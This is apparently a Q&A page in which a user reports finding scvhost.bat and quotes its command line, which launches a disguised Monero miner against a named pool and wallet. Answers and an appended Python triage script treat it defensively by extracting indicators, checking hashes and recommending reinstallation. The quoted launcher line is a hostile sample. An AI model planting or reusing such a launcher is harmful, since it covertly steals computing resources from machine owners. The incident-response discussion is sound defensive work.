17

I have just found this .bat file that was named scvhost.bat. The file had this content in it:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Is this a virus (to steal info etc.) or a planted miner? I am worried as I also dabble in cryptocurrencies, and stratum is a currency that is mentioned in the above file.

grg
  • 1
    This indeed seems to be a miner. Given that you use cryptocurrencies yourself, if you also mine, make sure this is not actually part of whatever you use to mine. You can do so by renaming the .bat extension to something else and seeing if you can still mine normally after a reboot. One thing I find odd about this file is that normally it would call itself, given that scvhost is both the name of what it executes and of the bat file. Normally that would result in a loop. – LPChip Jan 16 '18 at 09:34
  • @LPChip scvhost is a Windows system process, so the bat file is calling scvhost to start cryptonight.exe as a background service. – James Hyde Jan 16 '18 at 09:41
  • 2
    @VirtualAnomaly I think you are mistaking sVChost for the sCVhost mentioned here. Yes, I am very much aware that svchost is the mechanics for hosting services. – LPChip Jan 16 '18 at 09:55
  • Thank you guys for your response! I don't mine myself but do own a couple of coins. I found out that this was indeed a Monero coin miner installed on my system. No wonder my PC was getting so darn slow. I have the wallet address now and see the owner has mined 8+ Monero coins; that's around 3k :/ – NewbieProgrammer Jan 16 '18 at 10:00
  • 2
    @LPChip My apologies, you are correct, I was mistaken. – James Hyde Jan 16 '18 at 10:03
  • 2
    Somebody played too much Starcraft, I guess. – CodesInChaos Jan 16 '18 at 13:01
  • @CodesInChaos Is there a known issue with Starcraft, or why? (I obviously don't get it) – lucidbrot Jan 16 '18 at 17:28
  • 1
    @lucidbrot SCVs are the "builder" unit of one of the game's races (terrans), in which case it stands for "Space Construction Vehicle". – Aaron Jan 16 '18 at 18:26

1 Answer

34

This does seem to be a miner of some sort, especially since the parameter contains the URL of a mining pool. However, you need to be sure what is in the binary. It would make sense to compare checksums of the binary you found on your system with the releases made by the development team of the miner. If they differ, consider your system insecure.

Another issue is that you found out about this miner (probably because it was using a lot of CPU), but you have no idea what else happened on your system. If an intruder could launch the miner, they could've launched other things as well. It might be a good idea to recover from a backup or do a fresh install anyway.

mtak
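The two triage steps discussed on this page, pulling the indicators (pool, wallet, worker name) out of the launcher's command line in the question and comparing the dropped binary's checksum against the developers' published list as the answer recommends, as an added example that is not code from the question, the answer or any miner project. It assumes the cpuminer/xmrig-style flags seen in the .bat (-a, -o, -u, -p, -t), the "<wallet>.<worker>" username convention used by pools such as dwarfpool, and a coreutils-style SHA256SUMS file as the developers' checksum list; the page's copy of the command reads `-p MXXXXXX-t 02`, which is taken here to be a missing space. The binary and checksum list in `demo()` are constructed stand-ins.

```python
"""Triage helpers for a suspected planted miner: extract indicators from the
launcher command line and check the dropped binary against vendor hashes.

Added example (not from the question, the answer, or any miner's own code).
Assumptions: cpuminer/xmrig-style flags (-a -o -u -p -t); "<wallet>.<worker>"
pool usernames; a coreutils-style SHA256SUMS file as the release hash list.
"""
import argparse
import hashlib
import shlex
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Command line quoted in the question. The page shows "-p MXXXXXX-t 02";
# assumed here to be a missing space, restored as "-p MXXXXXX -t 02".
MINER_CMDLINE = (
    "scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 "
    "-u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf "
    "-p MXXXXXX -t 02"
)

BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def looks_like_monero_address(s: str) -> bool:
    """Standard Monero mainnet address: 95 base58 characters starting with '4'."""
    return len(s) == 95 and s[0] == "4" and set(s) <= BASE58


def parse_miner_cmdline(cmdline: str) -> dict:
    """Return indicators (pool host/port, wallet, worker) from a miner launch
    line. Unknown flags are ignored so this also works on service/task command
    strings that carry extra options."""
    argv = shlex.split(cmdline)
    p = argparse.ArgumentParser(add_help=False)
    p.add_argument("-a", "--algo")
    p.add_argument("-o", "--url")
    p.add_argument("-u", "--user")
    p.add_argument("-p", "--pass", dest="password")
    p.add_argument("-t", "--threads")
    opts, _unknown = p.parse_known_args(argv[1:])
    url = urlsplit(opts.url) if opts.url else None
    # Assumed pool convention: username is "<wallet address>.<worker id>".
    wallet, _, worker = (opts.user or "").partition(".")
    return {
        "binary": argv[0],
        "algo": opts.algo,
        "scheme": url.scheme if url else None,
        "pool_host": url.hostname if url else None,
        "pool_port": url.port if url else None,
        "wallet": wallet,
        "worker": worker,
        "wallet_is_monero": looks_like_monero_address(wallet),
        "threads": opts.threads,
    }


def sha256_file(path: Path) -> str:
    """Streaming SHA-256 of a file (miner binaries can be several MB)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_sha256sums(text: str) -> dict:
    """Parse coreutils-style lines ('<hex>  <name>' or '<hex> *<name>') into
    {name: hex}; blank and '#' lines are skipped."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        sums[name.lstrip(" *")] = digest.lower()
    return sums


def check_binary(path: Path, release_sums: dict) -> str:
    """'match:<release file>' if the file's SHA-256 appears in the vendor list,
    else 'unknown': a rebuilt/patched binary, so treat the host as compromised."""
    digest = sha256_file(path)
    for name, known in release_sums.items():
        if known == digest:
            return f"match:{name}"
    return "unknown"


def demo() -> dict:
    """Run both checks on constructed files; returns the results."""
    with tempfile.TemporaryDirectory() as d:
        found = Path(d) / "scvhost.exe"  # constructed stand-in for the dropped binary
        found.write_bytes(b"MZ\x90\x00 constructed stand-in for a miner binary")
        # Constructed checksum list standing in for the developers' release page.
        vendor = parse_sha256sums(
            "# SHA256SUMS for release x.y (constructed)\n"
            "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef  minerd.exe\n"
            f"{sha256_file(found)} *minerd-release.exe\n"
        )
        return {
            "indicators": parse_miner_cmdline(MINER_CMDLINE),
            "in_release": check_binary(found, vendor),
            "not_in_release": check_binary(found, {"minerd.exe": "0" * 64}),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

A hash match only tells you the binary is an unmodified build of a public miner; it says nothing about how it got there, which is why the answer still recommends treating the host as compromised. The pool host, port and wallet string are the values worth searching for in proxy and DNS logs and in any other scheduled tasks or services on the machine.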